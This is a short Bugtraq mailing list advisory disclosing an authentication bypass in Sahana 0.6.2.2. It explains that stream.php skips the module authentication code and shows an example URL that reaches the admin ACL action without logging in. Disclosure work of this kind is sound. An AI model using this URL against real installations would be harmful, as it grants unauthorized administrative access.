Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Sahana 0.6.2.2 Authentication Bypass

From: Christopher <vooduhal () gmail com>
Date: Wed, 17 Mar 2010 12:54:30 -0400
Ability to completely disable authentication via stream.php and commented
out module authentication code within it.

http://victim/<sahana_path>/index.php?mod=admin&act=acl_enable_acl
Authenticates correctly.

http://victim/<sahana_path>/stream.php?mod=admin&act=acl_enable_acl
Does not.
Previous By Date Next
Previous By Thread Next

Current thread: